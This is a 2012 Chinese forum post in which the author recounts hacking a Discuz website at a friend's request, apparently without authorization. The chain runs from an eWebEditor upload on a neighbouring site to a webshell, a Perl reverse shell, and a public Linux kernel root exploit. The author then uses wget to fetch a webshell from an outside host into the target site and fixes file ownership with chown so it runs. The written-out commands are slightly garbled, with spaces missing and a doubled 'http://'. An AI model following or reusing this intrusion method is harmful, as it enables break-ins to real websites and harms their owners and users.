一次linux入侵提权到搞定目标网站

[复制链接]
查看322 | 回复0 | 2012-4-1 19:20:27 | 显示全部楼层 |阅读模式
刚上qq,一朋友叫我搞个网站。闲着无事打开一看是dz的,我手里没有0day只好旁注了。发现一站有ewebeditor的php版,登录后台添加了样式加上php,结果上传php马不成功。后来通过网站的说明文件才知道ewebeditor后台的样式只有abc管用,老规矩搞到一shell。拿到shell一看是linux的,想着先跨站。shell浏览目标站不行,命令行下输入ls-la/www.users/目标站/也不行。连接mysql,想out个shell到目标站也失败了。没办好,只好溢出了。上传1.pl反弹个shell到cmd。uname-r查看版本,2.6.18的,马上想到udev,试了不行。然后去天阳那里的exp一个一个下了试了还是不行。



最后只好去http://www.milw0rm.com/看看搜索2.6出来好多,最终LinuxKernel<2.6.19udp_sendmsgLocalRootExploit(x86/x64)这个0day溢出成功,拿到root权限,pwd列出当前目录。然后cd到目标站目录。wgethttp://http://hi.baidu.com/bian花/shell.txtmvshell.txtshell.php。兴冲冲的去打开shell。结果提示&quot;CGI/PHP程序错误:该脚本不允许执行&quot;。无语了以为权限不够,直接chmod777shell.php还是提示那个错误。网上搜索了下有人提到chownftpd:xxxx.php,试了继续悲剧。




&nbsp;
后来想了会,chown这个命令是查看文件的所有者。ls-la论坛结果发现论坛的文件前面的拥有者是user_aaa后面是ftpd,继续执行chownuser_aaa:shell.php最终搞定了目标站。



其实有root权限了,能做许多事,当初touch个a.php然cat追加写入一句话,还是那个错误提示。当然我们完全可以查看论坛的conn文件,只是我一心想着在目标站写个shell
&nbsp;






*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则